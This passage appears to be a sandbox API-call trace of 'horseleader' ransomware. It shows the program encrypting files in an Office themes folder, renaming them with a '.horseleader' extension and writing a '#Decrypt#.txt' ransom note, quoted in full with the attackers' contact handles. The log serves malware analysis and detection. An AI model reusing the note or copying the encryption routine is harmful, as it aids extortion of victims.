(lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.736] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 78 [0247.736] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.736] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.736] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.736] lstrlenW (lpString=".testttjffg") returned 11 [0247.736] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.736] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.736] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.739] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 78 [0247.739] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.739] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2604) returned 1 [0247.739] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xa2c, lpOverlapped=0x0) returned 1 [0247.741] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff5d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.742] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xa2c, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xa2c, lpOverlapped=0x0) returned 1 [0247.742] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.742] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.742] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.743] CloseHandle (hObject=0x1a4) returned 1 [0247.743] GetProcessHeap () returned 0x780000 [0247.743] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.743] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.horseleader") returned 90 [0247.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.horseleader")) returned 1 [0247.744] GetProcessHeap () returned 0x780000 [0247.744] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.744] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212c4b00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d2019f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x212c4b00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x101e0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RIPPLE.ELM", cAlternateFileName="")) returned 1 [0247.744] lstrcmpiW (lpString1="RIPPLE.ELM", lpString2="Windows") returned -1 [0247.744] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM") returned 77 [0247.745] StrStrIW (lpFirst="RIPPLE.ELM", lpSrch=".horseleader") returned 0x0 [0247.745] lstrcmpW (lpString1="RIPPLE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.745] lstrcmpW (lpString1="RIPPLE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.745] lstrlenW (lpString=".testttjffg") returned 11 [0247.745] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.745] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.745] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM") returned 77 [0247.746] StrStrW (lpFirst="RIPPLE.ELM", lpSrch=".txt") returned 0x0 [0247.747] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=66016) returned 1 [0247.747] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.747] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.752] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.752] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.752] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x58f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.752] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.753] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.753] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.753] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb1e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.753] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.754] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.754] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.754] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.755] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.755] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.755] CloseHandle (hObject=0x1a4) returned 1 [0247.755] GetProcessHeap () returned 0x780000 [0247.755] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.755] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM.horseleader") returned 89 [0247.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.elm.horseleader")) returned 1 [0247.759] GetProcessHeap () returned 0x780000 [0247.759] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.759] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a89bd50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1e7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RIPPLE.INF", cAlternateFileName="")) returned 1 [0247.760] lstrcmpiW (lpString1="RIPPLE.INF", lpString2="Windows") returned -1 [0247.760] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF") returned 77 [0247.760] StrStrIW (lpFirst="RIPPLE.INF", lpSrch=".horseleader") returned 0x0 [0247.760] lstrcmpW (lpString1="RIPPLE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.760] lstrcmpW (lpString1="RIPPLE.INF", lpString2="_uninstalling_.png") returned 1 [0247.760] lstrlenW (lpString=".testttjffg") returned 11 [0247.760] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF", lpSrch=".testttjffg") returned 0x0 [0247.760] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.760] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.761] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF") returned 77 [0247.761] StrStrW (lpFirst="RIPPLE.INF", lpSrch=".txt") returned 0x0 [0247.761] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=487) returned 1 [0247.761] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1e7, lpOverlapped=0x0) returned 1 [0247.763] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.763] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1e7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1e7, lpOverlapped=0x0) returned 1 [0247.763] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.763] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.764] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.764] CloseHandle (hObject=0x1a4) returned 1 [0247.764] GetProcessHeap () returned 0x780000 [0247.764] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.764] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF.horseleader") returned 89 [0247.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\RIPPLE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\ripple.inf.horseleader")) returned 1 [0247.766] GetProcessHeap () returned 0x780000 [0247.767] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.767] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7ce7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.767] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.767] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 79 [0247.767] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.767] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.767] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.767] lstrlenW (lpString=".testttjffg") returned 11 [0247.767] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.767] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.767] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.769] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 79 [0247.769] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.769] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=31975) returned 1 [0247.769] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.773] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.773] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.774] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2ce7, lpOverlapped=0x0) returned 1 [0247.774] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd319, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.775] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2ce7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2ce7, lpOverlapped=0x0) returned 1 [0247.775] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.775] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.775] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.775] CloseHandle (hObject=0x1a4) returned 1 [0247.776] GetProcessHeap () returned 0x780000 [0247.776] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.776] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.horseleader") returned 91 [0247.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.horseleader")) returned 1 [0247.777] GetProcessHeap () returned 0x780000 [0247.777] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.778] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7ce7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.778] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.778] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\#Decrypt#.txt") returned 80 [0247.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.779] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.779] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.780] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9